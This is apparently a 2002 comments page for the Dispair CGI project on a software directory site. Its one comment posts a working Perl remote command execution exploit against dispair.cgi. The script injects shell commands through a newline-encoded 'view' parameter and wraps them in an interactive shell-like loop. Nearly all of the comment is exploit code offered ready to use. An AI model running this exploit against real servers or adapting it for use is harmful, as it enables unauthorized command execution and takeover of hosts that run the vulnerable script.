Projects / Dispair / Comments

RSS Comments for Dispair

30 Jul 2002 16:47 404

remote command execution exploit
target/cgi-bin/dispair...

Here is a perl script that provides a shell-like interface:

#!/usr/bin/perl

use strict;
use IO::Socket;

my $target = shift || die "usage: $0 <targetserver>";
my $cmd = '';

while ($cmd ne 'exit') {
print ">> "; $cmd = <STDIN>; chomp $cmd;
$cmd =~ s/ /%20/g;
my $socket = IO::Socket::INET->new(PeerAddr => $target, PeerPort => 'http(80)', Proto => 'tcp');
print $socket "GET /cgi-bin/dispair.cgi?file=fiddle&view=%0A$cmd HTTP/1.0\n";
print $socket "Host: $target\n";
print $socket "USER-AGENT: scriptkiddie\n\n";
while (<$socket>) { last if ($_ =~ m/^\r/); }
while (<$socket>) { print; }
close $socket;
}

Screenshot

Project Spotlight

Fotoxx

A photo editing and collection management application.

Screenshot

Project Spotlight

Alaya Webdav Server

A simple WebDAV 1.0 server.